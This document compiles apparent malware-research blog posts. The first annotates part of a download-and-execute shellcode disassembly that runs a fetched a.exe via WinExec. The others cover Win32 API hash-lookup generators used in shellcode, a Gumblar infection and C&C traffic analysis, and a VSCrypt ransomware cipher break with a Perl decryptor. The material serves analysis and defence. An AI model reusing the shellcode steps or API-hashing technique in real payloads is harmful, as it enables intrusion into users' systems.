; UINT WINAPI WinExec(

; __in LPCSTR lpCmdLine,

; __in UINT uCmdShow

; );

mov ebx,esp ; 8B DC ; EBX points to %systemdir%\a.exe

push eax ; 50 ; uCmdShow = either S_OK or E_OUTOFMEMORY or INET_E_DOWNLOAD_FAILURE

; I think what is intended is uCmdShow = 0

push ebx ; 53 ; lpCmdLine = %systemdir%\a.exe

call near [edi-0x10] ; FF57F0 ; WinExec("%systemdir%\\a.exe",0);


And that's it, we're basically done, so exit. Note, if someone wanted to fix the EXITFUNC feature for this in MSF, you can either store ExitThread or ExitProcess in the string table (the arguments are the same, but their lengths are off by one) or modify the shellcode logic itself. I'm very tempted to make the changes myself, but I've got a bunch of other stuff I need to get done this week.

(The easiest, but least elegant fix is to just swap out all the encoded strings starting at 0x10A and going all the way to the end.)


; VOID WINAPI ExitThread(

; __in DWORD dwExitCode

; );

push eax ; 50 ; ERROR_BAD_FORMAT or ERROR_FILE_NOT_FOUND or one

; of the other things WinExec() might return.

; It's 32 or over on success

call near [edi-0xc] ; FF57F4 ; ExitThread(EAX)

Let me know if I've made any errors in this write-up. I was too lazy to check most of this out in a debugger; it's all come directly out of my head.

I've put an easy-to-assemble version of all this here:


Note that NASM uses alternative instruction encodings for some x86 opcodes, so you won't get the exact same binary out of NASM as the original in MSF. If you don't know what this means, then don't worry, I'll explain it later.

Exercises for the reader

  1. Why does the shellcode use GetProcAddress() to look up the rest of the function names, instead of reusing the code which looked up "GetProcAddress" from the KERNEL32.DLL export table in the first place?

  2. What other shellcode has the same NumberOfFunctions versus NumberOfNames usage bug as this?

  3. What other shellcode uses %systemdir%\a.exe versus something else?

  4. What happens if URLDownloadToFileA() fails?




Win32 API Shellcode Hash Algorithm

1. A Modest Proposal

Daylight Saving Time

Allegedly, the purpose of Daylight Saving Time is to save energy by manipulating a unit of measurement.

Mileage Saving Time

I have a similar proposal for how to save on gasoline usage. If we redefine the mile to be 4,800 feet during summer, when people drive the most, then everyone will drive 10% more miles per gallon of gas. So for example, if your car gets 30MPG during the winter, then during Mileage Saving Time you'd be getting 33MPG!

(Actually, it's more like redefining the distance between San Francisco, and Sacramento from 90 miles to 80 miles. That way the two cities are closer together, reducing the amount of time and energy spent traveling between them.)

2. Something Technical

Simple Hash Function(s)

I occasionally spend time reverse engineering shellcode used in various attacks. And, someday, should you find yourself in a similar situation, the following information might be useful…

The Last Stage of Delirium research group, back in 2002, published a technique for doing Win32 API RVA lookups using only the hash of a string (the name of the API function) rather than storing, and performing a full compare on, the very long string. (Which some shellcode still does anyway.)

In their paper, they proposed the use of a simple shift and add style integer hash. (Just like the ones taught in a CompSci 101 class.) I don't believe that this hash has a more proper name. In the paper, and accompanying [hard to find] PoC code, they used h=((h<<5)|(h>>27))+c to calculate the hash. (c being each letter of the string, and h the running total.)
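The LSD hash in Ruby, with a hand-computed sanity value for "AB" ((65 << 5) + 66 = 2146; that check value is mine, not a constant from the paper):

```ruby
# h = ((h << 5) | (h >> 27)) + c, truncated to 32 bits at each step.
def lsd_hash(name)
  name.each_byte.inject(0) do |h, c|
    rol5 = ((h << 5) | (h >> 27)) & 0xFFFFFFFF  # rotate left by 5
    (rol5 + c) & 0xFFFFFFFF                     # add the next character
  end
end

printf("%08x\n", lsd_hash("AB"))  # (65 << 5) + 66 = 2146 = 0x00000862
```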

Reference: (§2.1 Page 9)
(wasn't linked to on the site, hard to find) is down at the moment, let me know if you really need a copy of these files and can't find them elsewhere. ('Cause I found copies.)

For some reason — probably widespread code availability and copy pasta — this is the only hash algorithm ever used in any shellcode I've seen. Little things like this make it possible to construct a phylogenetic tree of shellcode evolution/authorship over time.


I got tired of asking, Wait, what was 0xEC0E4E8E again? So, I made up a table of every hash, for most of the common Win32 API functions. Hopefully this gets indexed by Google, as I have a habit of using that to search, rather than remembering where I left my list.

A Perl script to generate that table

#!/usr/bin/perl -w

use strict;

sub ror {
    my $number = shift;
    my $bitshift = shift;
    return (($number >> $bitshift) | ($number << (32 - $bitshift))) & 0xFFFFFFFF;
}

sub hash {
    my @name = unpack("C*", shift);
    my $hash = 0;
    for (my $i = 0; $i <= $#name; $i++) {
        $hash = (ror($hash, 0xD) + $name[$i]) & 0xFFFFFFFF;
    }
    return $hash;
}

while (<>) {
    chomp;
    printf("%08x\t%s\n", hash($_), $_); # modify this line if you want SQL or HTML, &c.
}
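The same thing in Ruby, for cross-checking; 0xEC0E4E8E (the value I keep forgetting) is the ROR-13 hash of "LoadLibraryA":

```ruby
# Ruby port of the Perl table generator above: h = ror13(h) + c, 32-bit.
def ror13(h)
  ((h >> 13) | (h << 19)) & 0xFFFFFFFF  # rotate right by 0xD
end

def api_hash(name)
  name.each_byte.inject(0) { |h, c| (ror13(h) + c) & 0xFFFFFFFF }
end

printf("%08x\t%s\n", api_hash("LoadLibraryA"), "LoadLibraryA")  # => ec0e4e8e
```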


Excerpt from Last Stage of Delirium's PoC

This is the code that almost nobody ever saw, and is never used by malware.

xor eax,eax ; index

i3: mov esi,[4*eax+ebx] ; ptr to symbol name

add esi,edx ; rva2va

push ebx ; hash: h=((h<<5)|(h>>27))+c

push eax

xor ebx,ebx

i4: xor eax,eax ; hash loop

lodsb
rol ebx,5

add ebx,eax

cmp eax,0

jnz i4

ror ebx,5

cmp ebx,ecx ; hash compare

pop eax

pop ebx

je i5 ; same: symbol found

inc eax

jmp i3 ; different: go to the next symbol

Or in actual bytes…

00000985 53 push ebx

00000986 50 push eax

00000987 33DB xor ebx,ebx ; hash loop

00000989 33C0 xor eax,eax

0000098B AC lodsb

0000098C C1C305 rol ebx,0x5

0000098F 03D8 add ebx,eax

00000991 83F800 cmp eax,byte +0x0

00000994 75F3 jnz 0x989

00000996 C1CB05 ror ebx,0x5

00000999 3BD9 cmp ebx,ecx ; hash compare

0000099B 58 pop eax

0000099C 5B pop ebx

0000099D 7403 jz 0x9a2

0000099F 40 inc eax

000009A0 EBDE jmp short 0x980

The Table (For Google's Sake)

This is just to make it easy to Google for any of these DWORDs. (As big- and little-endian DWORDs and BYTEs in various formats.)



Julia Wolf @ FireEye Malware Intelligence Lab


Questions/Comments to research [@] fireeye [.] com

Gumblar… Not Gumby!

Ok, I admit this blog post is not about our childhood TV friend, Gumby... Instead it's about a much more sinister character, Gumblar & its malware henchmen...

Originally making its debut back in March/April of this year (see here and here), it then suddenly went quiet for a few months, until recently... Yes, Gumblar is back with a vengeance & still causing problems for its unsuspecting victims.

The primary delivery mechanism is still via Drive-By-Download (notably compromised sites serving malicious Adobe PDFs) which, when successful, will load the malware onto your system.

We have taken a look at a couple of the Gumblar associated malware samples, you can see some VirusTotal results here & here.

Here is a quick peek at what this bad-guy is doing...
Once loaded onto the victim's system, it silently executes without any obvious indications to the end-user. (No fake AV pop-ups, instant reboots, tray icons or ransom notes here.)

The UPX-packed executable will proceed to write out a file (disguised as an innocent temp or backup file) one subdirectory beneath its current location.
The dropped file, actually a .dll (18432 bytes in size), uses a randomly generated (3-6 character) filename with the extension ".tmp", ".bak", ".dat" or ".old".


Filename extensions visible when looking at the binary in a hex editor.

It goes on to delete a couple audio drivers from the "c:\windows\system32\" directory (sysaudio.sys & wdmaud.sys).
Along with deleting these, it adds the following registry key:

"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32\midi9"

The above registry key value "midi9" actually equates to executing "<dropped_file> 0yAAAAAAAA" when loaded.
The system will now use the evil .dll file anytime the browser is loaded.

(Note the .bak file followed by the "0yAAAAAAAA" string, it's always there).

The malware will also generate an ID string (32 characters long) that gets sent to the C&C.



Sample screen shots of the malware's string generation routine.

The malware will also attempt to rename itself to no filename (null) upon reboot, by calling MoveFileEx with the MOVEFILE_DELAY_UNTIL_REBOOT flag (0x4).

A quick peek at the registry shows it created an entry under

HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations

Normally OK, except in the value data there is only one entry when there should be a pair (the current file name & what to rename it to upon reboot).

Once the infection process completes, it quietly waits for you to access a website using your browser.
Here is where this guy really starts to go to work, stealing FTP credentials and potentially skewing search results. Anything your browser sees, IT sees...

A quick look at a running packet capture shows that, along with the normal HTTP traffic, it has taken the opportunity to communicate with the C&C.
It has sent the 32 character string (prefixed with "?0E2" & followed by a "0" at the end) in the URI to the C&C, and received back a response as displayed here:


Notice the "SS: " & "Xost: " fields in the HTTP Header.
The "SS:" field contains the URI you were accessing & the "Xost:" field holds the original destination host/site.
Also of note is the response from the server.
The "//fHqq0EDFBNEED" is always present followed by the 32 byte string that was sent to the C&C, and then 2 additional bytes (the "2y" at the end).
(If you see this type of traffic on your network, it's time to be a little concerned...)
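A rough, hypothetical signature for this traffic, based only on the markers described above (the 32-character ID is assumed to be alphanumeric; adjust to match what you actually observe):

```ruby
# Hypothetical detector for the beacon/response markers described above.
BEACON_RE       = /\?0E2[0-9A-Za-z]{32}0/  # "?0E2" + 32-char ID + trailing "0"
RESPONSE_MARKER = "//fHqq0EDFBNEED"        # always present in the C&C response

def gumblar_suspect?(uri, body)
  !!(uri =~ BEACON_RE) || body.include?(RESPONSE_MARKER)
end
```

Anything matching either marker in a capture would be worth a closer look.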

The malware attempts to contact one of 3 IPs:

1.) - still alive & well.

OrgName: Secured Private Network 
Address: 1740 East Garry Ave.
Address: Suite 234
City: Santa Ana
StateProv: CA
PostalCode: 92705
Country: US
NetRange: -
OriginAS: AS22298
NetName: SPN3W
NetHandle: NET-67-215-224-0-1
Parent: NET-67-0-0-0-0
NetType: Direct Allocation
RegDate: 2007-10-18
Updated: 2008-10-08

2.)  - known Crimeware friendly ISP as mentioned here.

OrgName: Netelligent Hosting Services Inc.
OrgID: NHS-31
Address: 1396 Franklin Drive
City: Laval
StateProv: QC
PostalCode: H7W-1K6
Country: CA
NetRange: -
NetHandle: NET-67-212-64-0-1
Parent: NET-67-0-0-0-0
NetType: Direct Allocation
RegDate: 2007-08-30
Updated: 2008-06-20

3.) - which appears to host 9 other sites, including some leading to pages serving FakeAV.

inetnum: -
netname: ROOT-195-24-72-0-21
descr: root eSolutions
country: LU
admin-c: AB99-RIPE
tech-c: RE655-RIPE
mnt-by: ROOT-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
source: RIPE # Filtered

So while unsuspecting victims go about their usual web activity, the malware will quietly send data to any one of these 3 IPs (in the above order).

Without careful inspection, this communication can easily snake by perimeter defenses & security software.

More to come...

A special thanks to my colleagues Atif Mushtaq & Julia Wolf.

J.G. @ FireEye Malware Intelligence Lab

Detailed Question/Comments : research SHIFT-2 fireeye DOT COM


Cryptanalysis of VSCrypt Ransomware and the Control Sum Cript Algorithm v1.0


I was recently sent an email by someone who was hit with a new species of ransomware. This one encrypted all of the documents on the system, attached the extension .vscrypt to the end, and changed the desktop wallpaper to a ransom note written in Russian. Here are my findings…

MD5 Sum:      56e78abca7acad5165b7390eaa32ca67
Filename:     Possible trojan.scr
Magic Number: MS-DOS executable (EXE), OS/2 or MS Windows
Packer:       not detected (because I haven't kept my database up to date)
Build Time:   Fri Jun 19 15:22:17 1992

…when executed, drops the following files onto the system: [It pretends to be an installer for Windows Media Player 9 (English).]

MD5 Sum:      7e5f5bea9600121a41dd4619abf70029
Filename:     /Program Files/Flash Media Arts,inc/SWF Video/23854356.avi
Magic Number: MS-DOS executable (EXE), OS/2 or MS Windows
Packer:       Microsoft Visual C++ v7.0
Build Time:   Tue Nov 20 16:59:32 2007

MD5 Sum:      010d7b79d002d747f420a7880f89ee38
Filename:     /Program Files/Flash Media Arts,inc/SWF Video/Free_update.exe
Magic Number: MS-DOS executable (EXE), OS/2 or MS Windows
Packer:       Microsoft Visual Basic v5.0/v6.0
Build Time:   Tue May 12 04:03:40 2009

MD5 Sum:      aa74d413fcc98fef29ba9bd75f894093
Filename:     /Program Files/Flash Media Arts,inc/SWF Video/Uninstall.exe
Magic Number: MS-DOS executable (EXE), OS/2 or MS Windows
Packer:       not detected, but packed anyway
Build Time:   Fri Jun 19 15:22:17 1992

MD5 Sum:      031fc32cd1b5bde5b1efa1d148815000
Filename:     /Program Files/Flash Media Arts,inc/SWF Video/Uninstall.ini
Magic Number: ISO-8859 text, with CRLF line terminators
Packer:       N/A
Build Time:   N/A

MD5 Sum:      d3583ac12d068e231c0b1e62c2a7eb49
Filename:     /Program Files/Flash Media Arts,inc/SWF Video/Video_codec.exe
Magic Number: MS-DOS executable (EXE), OS/2 or MS Windows
Packer:       Microsoft Visual Basic v5.0/v6.0
Build Time:   Tue May 12 04:03:40 2009

MD5 Sum:      5f9927ee59b4881a2ce8634332f63fa8
Filename:     /Program Files/Flash Media Arts,inc/SWF Video/svchost.exe
Magic Number: MS-DOS executable (EXE), OS/2 or MS Windows
Packer:       Microsoft Visual Basic v5.0/v6.0
Build Time:   Tue May 12 04:03:40 2009

It immediately executes Video_codec.exe and svchost.exe. svchost.exe and CSCA1.DLL were written in Delphi. These files all use the same packer, written in Visual Basic 6 of all things. The packer uses Blowfish, and has a giant blob of a Base64 encoded EXE file embedded in it, which it drops to disk, and then that does something else, and blah blah blah, I got around it on the first try. Whoever compiled this packer appears to have a German locale, based upon paths like: C:\Programme\Microsoft Visual Studio\VB98\VB6.OLB (Free_update.exe is a keylogger by the way.) The VSCrypt ransomware is svchost.exe in this case. And these are the files it drops when executed:

MD5 Sum:      b817a4c8ca2479be0ea7e5dab1cb4432
Filename:     /vsworkdir/CSCA1.DLL
Magic Number: MS-DOS executable (EXE), OS/2 or MS Windows
Packer:       not detected (because I haven't kept my database up to date)
Build Time:   Fri Jun 19 15:22:17 1992

MD5 Sum:      80e1d714045a4402e3992a195f7e7a08
Filename:     /vsworkdir/shantazh.jpg
Magic Number: JPEG image data, JFIF standard 1.00, comment: "LEAD Technologies Inc. V1.01"
Packer:       N/A
Build Time:   N/A

So what does it do?

VSCrypt (svchost.exe) searches each directory on the system, for the following files:


For each matching file it finds, it encrypts the file using the Control Sum Cript Algorithm v1.0 (CSCA1.DLL) with the password Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql (more on this below), appends .vscrypt to the end of the filename, and deletes the original. At the end of this process, it drops shantazh.jpg and sets [HKEY_CURRENT_USER\Control Panel\Desktop] ConvertedWallpaper = "C:\vsworkdir\shantazh.jpg" in the registry, setting the desktop background to the «шантаж» (blackmail) note.

All your files are belong to us.

I went through the effort of typing this in while translating, so here is the text of the message in the shantazh.jpg file. I don't speak Russian very well, so please forgive me if I made any typos.

Привет я Trojan encoder точнее одна из его разновидностей ::) мой автор человек с ником КОРЕКТОР и он с удовольствием продаст вам дешифратор для тех файлов что я успел зашифровать на вашем компьютере за скромную сумму в 10 долларов это где то 350 рублей вот данные для свизи с моим хозяином

[Hi, I'm Trojan encoder, or rather one of its variants ::) my author is a person with the nickname KOREKTOR, and he will gladly sell you a decryptor for the files I managed to encrypt on your computer, for the modest sum of 10 dollars, which is about 350 rubles. Here is the contact info for my owner:]

Mail: icq 481095

ах да чуть не забыл не стирайте файлы с расширением vscrypt если сотрете вернуть зашифрованую информацию станет не возможно

[Oh yes, I almost forgot: don't delete the files with the vscrypt extension; if you do, it will become impossible to get the encrypted information back.]

Удачи искренне ваши Trojan encoder и КОРРЕКТОР

[Good luck, sincerely yours, Trojan encoder and KORREKTOR]

It basically says that either a person or a program named Trojan Encoder (I can't tell) has encrypted your files, and if you want them back, someone going by the nickname CORRECTOR is selling the decryptor for the affordable price of US$10, or about 350 Rubles. (Update: better translation here)

So here, I'll save you the US$10…

Control Sum Cript Algorithm v1.0

This is an additive stream cipher, which generates its keystream by repeatedly taking the CRC32 sum of a shuffled string (the password). The shuffling algorithm takes the first byte of the password and moves it to the end. On the next call, it takes the second byte of the password and moves that to the end. Then the third byte, moved to the end. And so on, until it reaches the end of the string; then it goes back to the first byte and moves that to the end, and so on. Intuitively, if you shuffle a deck of cards this way, it'll eventually unshuffle itself (since you always swap with the same positions). For a deck of 38 cards, or a password of 38 characters, the pattern will cycle after only 1110 shuffles. Making the password longer won't help, and the relationship isn't linear: 50 characters will cycle after 735 shuffles, and 65 characters will cycle after 448 shuffles. (But if you want to try this experiment with a deck of 52 cards, it's going to take 32,844 card swaps to get the cards back into their original order.) So, basically, the number of permutations before you cycle is this sequence: A051732, "Number of interlacings (or shuffles) required to restore deck of n cards to original order", times (n-1), i.e. a(n)*(n-1). (Thanks to Andrea for finding that for me.)
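As a sanity check, the shuffle and its cycle length are easy to reproduce in a few lines of Python. This is a sketch, not the malware's code; permutate is a straight port of the shuffle from the Perl proof-of-concept further down.

```python
def permutate(offset, key):
    # Move the byte at position (offset mod len-1) to the end of the string,
    # mirroring the malware's shuffle.
    i = offset % (len(key) - 1)
    return key[:i] + key[i + 1:] + key[i]

password = "Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql"  # 38 characters

state, shuffles = password, 0
while True:
    state = permutate(shuffles, state)
    shuffles += 1
    # The sequence repeats once the string is back to the original *and*
    # the shuffle position has wrapped back around to the start.
    if state == password and shuffles % (len(password) - 1) == 0:
        break

print(shuffles)  # 1110 for this 38-character password
```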

So, with a four-byte CRC32 of this shuffled password, the keystream cycles every (1110*4)=4440 bytes.

Offset  Generator  CRC (keystream)
0     crc32("antazma1518061DgFgvFdvHyfvFdWwlm876QlF")  bc 2f 25 80
4     crc32("atazma1518061DgFgvFdvHyfvFdWwlm876QlFn")  ae f8 53 e4
8     crc32("atzma1518061DgFgvFdvHyfvFdWwlm876QlFna")  c3 0b 1d c9
12    crc32("atza1518061DgFgvFdvHyfvFdWwlm876QlFnam")  68 9b 8f aa
16    crc32("atza518061DgFgvFdvHyfvFdWwlm876QlFnam1")  d8 d4 a7 6a
[...]
4432  crc32("Fantazma1518061DgFgvFdvHyfvFdWwlm876lQ")  34 20 02 e1
4436  crc32("Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql")  9b 24 82 d3
4440  crc32("antazma1518061DgFgvFdvHyfvFdWwlm876QlF")  bc 2f 25 80
4444  crc32("atazma1518061DgFgvFdvHyfvFdWwlm876QlFn")  ae f8 53 e4

You just XOR

bc 2f 25 80 ae f8 53 e4 c3 0b 1d c9 68 9b 8f ...

with your data to encrypt or decrypt it. Here's a link to the full keystream if you're curious: Download vscrypt_keystream.bin. Statistics about this keystream appear below.
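For reference, here's the keystream generation and XOR step in Python. A sketch, not the malware's own code: zlib.crc32 computes the same standard CRC-32 that Archive::Zip::computeCRC32 does, and struct's "<I" matches Perl's pack("V") little-endian packing.

```python
import struct
import zlib

PASSWORD = "Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql"

def permutate(offset, key):
    # Move the byte at position (offset mod len-1) to the end of the string.
    i = offset % (len(key) - 1)
    return key[:i] + key[i + 1:] + key[i]

def keystream(nwords, key=PASSWORD):
    # Each shuffle yields one 4-byte keystream word: the CRC32 of the
    # shuffled password, packed little-endian like Perl's pack("V").
    out = b""
    for i in range(nwords):
        key = permutate(i, key)
        out += struct.pack("<I", zlib.crc32(key.encode()))
    return out

def vscrypt_xor(data):
    # XOR is symmetric, so the same function encrypts and decrypts.
    ks = keystream((len(data) + 3) // 4)
    return bytes(a ^ b for a, b in zip(data, ks))

print(keystream(3).hex())  # bc2f2580aef853e4c30b1dc9, matching the table above
```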

<speculation>I believe that it's possible to recover the password, given only the keystream from this cipher. (Just hand the program you want to crack a file full of nulls to get the keystream.) You can easily figure out the length of the password from the cycle length of the keystream. And CRC32 is very linear; you can reverse the function and get some of the original bits out. With a zillion CRCs (one for each permutation), and with knowledge of which eight bits of the key are being shuffled each time, it should be possible to just write a big linear equation to solve for the key, given only the keystream.</speculation>
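The "CRC32 is very linear" point is concrete: over equal-length buffers, CRC32 is affine over GF(2), so for any three same-length messages a, b, c, crc(a) XOR crc(b) XOR crc(c) equals crc(a XOR b XOR c) (the affine constants cancel in threes). A quick illustration:

```python
import zlib

def xor_bytes(*bufs):
    # Byte-wise XOR of equal-length buffers.
    return bytes(x ^ y ^ z for x, y, z in zip(*bufs))

a, b, c = b"files full", b"of nulls..", b"keystream!"  # all the same length
lhs = zlib.crc32(a) ^ zlib.crc32(b) ^ zlib.crc32(c)
rhs = zlib.crc32(xor_bytes(a, b, c))
print(lhs == rhs)  # True: CRC32 is affine over GF(2)
```

This is what makes "write a big linear equation to solve for the key" plausible: each keystream word is a linear function of the shuffled password bits.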

Also, any repeated CRC32 in the stream indicates that there is a letter (octet) which appears at least twice in the password. (When the two identical octets have been moved to the end, at positions (length) and (length-1), and it's permutation number (length - 1 - (offset MOD length)), the two swap with themselves, giving the same CRC result twice in a row.) In the password Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql, for example, the letter v does this.

Iteration  Generator  CRC (keystream)
328  crc32("W1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmylvFv")  95 f4 fb ca
329  crc32("W1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmlvFvy")  6e 95 cd 36
330  crc32("W1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmlFvyv")  01 89 aa f5
331  crc32("W1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmlFyvv")  f3 d2 6e 79
332  crc32("W1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmlFyvv")  f3 d2 6e 79
333  crc32("1wF0gF6Dfd8nmtQgl5v71aaFz861aHdmlFyvvW")  6d ae 69 d4
[...]
884  crc32("W1wF0gF6Df18nmtQgl5v7daaFz861aHdmlvFvy")  92 1a 36 f9
885  crc32("W1wF0gF6Df18nmtQgl5v7daaFz861aHdmlFvyv")  fd 06 51 3a
886  crc32("W1wF0gF6Df18nmtQgl5v7daaFz861aHdmlFyvv")  0f 5d 95 b6
887  crc32("W1wF0gF6Df18nmtQgl5v7daaFz861aHdmlFyvv")  0f 5d 95 b6
888  crc32("1wF0gF6Df18nmtQgl5v7daaFz861aHdmlFyvvW")  d5 eb ad 60

The letter v appears in the string Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql at positions 20, 23, and 27 (counting up from 1; this is math, not computer science). So there is some kind of mathematical relationship between the numbers 20, 23, 27, 38, 331, 332, 886, 887, and 1110, but I haven't figured out what it is yet.
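You can find those repeat positions mechanically by generating one full cycle of keystream words and scanning for consecutive duplicates. A sketch, with permutate ported from the shuffle in the Perl PoC below:

```python
import zlib

def permutate(offset, key):
    # Move the byte at position (offset mod len-1) to the end of the string.
    i = offset % (len(key) - 1)
    return key[:i] + key[i + 1:] + key[i]

key = "Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql"
words = []
for i in range(1110):  # one full keystream cycle
    key = permutate(i, key)
    words.append(zlib.crc32(key.encode()))

dups = [i for i in range(len(words) - 1) if words[i] == words[i + 1]]
print(dups)  # [331, 886]: the iteration pairs 331/332 and 886/887 above
```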

So, yeah: even if you can't just rip the password out of the EXE and have to treat this cipher as a black box, I believe that key recovery is possible with only knowledge of the keystream.


Disassembly/Source Code


In the first draft of this, I had a disassembly of most of the code out of C:\vsworkdir\CSCA1.DLL, with some commentary by me on what things were doing. But then I discovered the source code for CSCA1.DLL on the «Блог программистов» (Programmer's Blog), which is much more understandable than my marked-up disassembly. Source Code: and this is the article that rpy3uH (the author) wrote about it: «Шифровка с помощью пароля. Улучшаем алгоритм шифрования» (Encrypting with a password. Improving the encryption algorithm. [or something like that]) I don't really speak Russian, so I wasn't sure at first whether this was just an analysis of CSCA1.DLL by someone else, or the origin. It seems to refer to some earlier article about a cipher that's not as good as this one, but I can't quite figure out where that is.


Proof of Concept



Anyway, I hacked together a vscrypt decoder in Perl. It needs some work, but I spent less than an hour on this. I don't recommend that you use this at all, but if you're writing your own decoder, this is something to work from.


perl foo.txt.vscrypt foo.txt


perl inputfile outputfile




#!/usr/bin/perl -w

use lib qw( blib/lib lib );
use Archive::Zip;
use FileHandle;
use Fcntl;

exit(0); # Don't really use this script, it's a demo for other programmers.

my $infile  = shift; # TODO: check for missing arguments.
my $outfile = shift;
my $inbuf;
my $outbuf;

sysopen(IN , $infile , O_RDONLY); binmode(IN );
sysopen(OUT, $outfile, O_WRONLY|O_CREAT); binmode(OUT);

my $key = "Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql";

# I'm sure there must be a more clever way to do this in Perl
sub permutate {
    my $offset = shift;
    my $key    = shift;
    $offset = $offset % (length($key) - 1);
    my $beginning = substr($key, 0, $offset);
    my $middle    = substr($key, $offset, 1);
    my $end       = substr($key, $offset + 1);
    $key = $beginning . $end . $middle;
    return $key;
}

#for (my $i=0; $i < 60 ; $i++) {
#    $key = permutate($i,$key);
#    printf("%i\t%s\t%08x\n",$i,$key,Archive::Zip::computeCRC32($key,0));
#}

my $offset = 0;
while (0 != sysread(IN, $inbuf, 4)) {
    $key = permutate($offset++, $key);
    #DEBUG printf("%08x\t%08x\n",unpack("V",$inbuf),Archive::Zip::computeCRC32($key,0));
    $outbuf = unpack("V", $inbuf) ^ Archive::Zip::computeCRC32($key, 0);
    syswrite(OUT, pack("V", $outbuf), 4);
}

# TODO: Deal with the last one, two, or three bytes.





There is also a free tool written and distributed by Dr. Web:

I can't endorse it, but I'm sure that it works better than my Perl script.



What about .encrypt files?



That's something completely different. That's GPCode, and I'm going to write something up on it soonish. If you suddenly find yourself in the situation where all of your documents are encrypted, with .encrypt at the end of each filename, stop using the machine immediately; yank the plug if you have to. Your files still exist in the newly created empty space of the filesystem, and you can undelete them if you don't overwrite them first. If you catch this early enough, I think it is also possible to dump the memory from the system and pull the encryption key out of it. (I haven't tested this yet.) If you don't know how to do a memory dump of your system, you're better off just pulling the plug and going the undelete route. Oh, and if you are hit by this, and you do undelete the malware that did this, please send me a sample. –julia


You can stop reading now



This is all of the entropy that is really in vscrypt…

echo -n Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql | stan




General statistics for the stream, bytes 38

Arithmetic mean: 86.473684 ~ 0x56(V)

Median: 97.000000 ~ 0x61(a)

Deviation: 25.538142

Chi-Square test: 464.269556

Entropy per byte: 4.346226

Correlation co.: 0.442653

Pattern length 1, different 23, total 38, bytes 38, depth 6

- Pattern range

0x30(0): 0x00000001 - 0x7a(z): 0x00000001

- 10 most used patterns

0x46(F): 0x00000004 0x31(1): 0x00000003 0x61(a): 0x00000003

0x76(v): 0x00000003 0x38(8): 0x00000002 0x36(6): 0x00000002

0x67(g): 0x00000002 0x64(d): 0x00000002 0x6d(m): 0x00000002

0x6c(l): 0x00000002

Pattern length 2, different 35, total 37, bytes 38, depth 9

- Pattern range

0x3036(06): 0x00000001 - 0x7a6d(zm): 0x00000001

- 10 most used patterns

0x7646(vF): 0x00000002 0x4664(Fd): 0x00000002 0x4661(Fa): 0x00000001

0x3135(15): 0x00000001 0x3036(06): 0x00000001 0x3531(51): 0x00000001

0x3138(18): 0x00000001 0x3144(1D): 0x00000001 0x3830(80): 0x00000001

0x3631(61): 0x00000001
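If you don't have stan handy, the headline numbers above are reproducible in a few lines of Python. A sketch: "entropy per byte" here is the usual Shannon entropy of the byte histogram, and the mean is just the average byte value.

```python
import math
from collections import Counter

password = b"Fantazma1518061DgFgvFdvHyfvFdWwlm876Ql"
n = len(password)

# Average byte value (stan's "Arithmetic mean").
mean = sum(password) / n

# Shannon entropy of the byte histogram (stan's "Entropy per byte").
entropy = -sum((c / n) * math.log2(c / n) for c in Counter(password).values())

print(round(mean, 6), round(entropy, 6))  # 86.473684 4.346226
```

Only about 4.35 bits of entropy per byte, versus 7.95 for the full generated keystream; the CRC mixing hides the weak password, but doesn't add any real entropy.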




And these are the stats for the whole generated keystream. Notice that 0xf3d26e79 and 0x0f5d95b6 appear twice in the stream. See the stuff above about the letter v.

stan -p 4 vscrypt_keystream.bin




General statistics for the stream, bytes 4440

Arithmetic mean: 128.209685

Median: 129.000000

Deviation: 73.703444 ~ 0x49(I)

Chi-Square test: 276.303657

Entropy per byte: 7.953987

Correlation co.: -0.029830

Pattern length 1, different 256, total 4440, bytes 4440, depth 16

- Pattern range

0x00( ): 0x00000019 - 0xff( ): 0x00000013

- 10 most used patterns

0x2f(/): 0x0000001e 0x10( ): 0x0000001d 0x48(H): 0x0000001d

0x1b( ): 0x0000001b 0x12( ): 0x0000001b 0xe0( ): 0x0000001b

0xfb( ): 0x0000001a 0x00( ): 0x00000019 0x94( ): 0x00000019

0x60(`): 0x00000019

Pattern length 2, different 4285, total 4439, bytes 4440, depth 28

- Pattern range

0x0005( ): 0x00000001 - 0xfff6( ): 0x00000001

- 10 most used patterns

0x00cd( ): 0x00000003 0x948b( ): 0x00000003 0x20bb( ): 0x00000002

0x0be4( ): 0x00000002 0x0921( !): 0x00000002 0x04f8( ): 0x00000002

0x01c2( ): 0x00000002 0x08a7( ): 0x00000002 0x07f0( ): 0x00000002

0x1dc9( ): 0x00000002

Pattern length 3, different 4432, total 4438, bytes 4440, depth 31

- Pattern range

0x000592( ): 0x00000001 - 0xfff609( ): 0x00000001

- 10 most used patterns

0xf3d26e( n): 0x00000002 0xd26e79( ny): 0x00000002

0x4d7fc2(M ): 0x00000002 0x00cdc5( ): 0x00000002

0x0f5d95( ] ): 0x00000002 0x5d95b6(] ): 0x00000002

0x00c1b1( ): 0x00000001 0x006fe1( o ): 0x00000001

0x001b3e( >): 0x00000001 0x000592( ): 0x00000001

Pattern length 4, different 4435, total 4437, bytes 4440, depth 30

- Pattern range

0x0005921a( ): 0x00000001 - 0xfff60921( !): 0x00000001

- 10 most used patterns

0xf3d26e79( ny): 0x00000002 0x0f5d95b6( ] ): 0x00000002

0x0b1dc968( h): 0x00000001 0x094b425f( KB_): 0x00000001

0x01603ee9( `> ): 0x00000001 0x00cdece4( ): 0x00000001

0x00c1b1f0( ): 0x00000001 0x006fe10f( o ): 0x00000001

0x001b3e2b( >+): 0x00000001 0x0005921a( ): 0x00000001

Julia Wolf @ FireEye Malware Intelligence Lab

Questions/Comments to research [@] fireeye [.] com

Upcoming Jan & Feb Events Where We Are Presenting Research

